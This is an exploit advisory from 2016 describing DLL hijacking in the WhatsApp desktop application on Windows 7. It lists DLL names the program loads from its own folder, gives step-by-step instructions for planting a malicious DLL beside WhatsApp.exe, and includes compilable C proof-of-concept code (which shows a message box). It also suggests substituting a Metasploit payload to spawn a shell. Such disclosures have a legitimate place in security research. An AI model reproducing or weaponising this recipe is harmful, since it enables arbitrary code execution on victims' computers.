# Exploit Title: WhatsApp DLL Hijacking
# Date: 8-9-2016
# Author: Ashiyane Digital Security Team
# Vendor Homepage:https://www.whatsapp.com
# software link:
https://web.whatsapp.com/desktop/windows/release/ia32/WhatsAppSetup.exe
# Tested on:Windows 7
----------------------------------------------------------------------------------------------------------
vulnerable DLLs :
api-ms-win-core-localization-obsolete-l1-2-0.dll
api-ms-win-core-datetime-l1-1-1.dll
ext-ms-win-kernel32-package-current-l1-1-0.dll
api-ms-win-appmodel-runtime-l1-1-1.dll
api-ms-win-core-localization-l1-2-1.dll
api-ms-win-core-fibers-l1-1-1.dll
api-ms-win-core-synch-l1-2-0.dll

If an attacker can place the malicious dll with any names of above
series in same location
with WhatsApp.exe where victim open WhatsApp.exe it will load and run
the attackers DLL
and code.
also can generate a msfpayload DLL and spawn a shell, for example.
important: on windows 8.1 not tested
----------------------------------------------------------------------------------------------------------
# Exploit:
1- Save and compile below C code to create vuln DLL

2- Place vuln DLL on Same Directory of WhatsApp.exe

3- Open WhatsApp.exe

//gcc test.c -o shcore.dll -shared
//this dll show a message box
#include <windows.h>
#define DllExport __declspec (dllexport)

BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}

int dll_hijack()
{
MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}
#################
Discovered By : Amir.ght
#################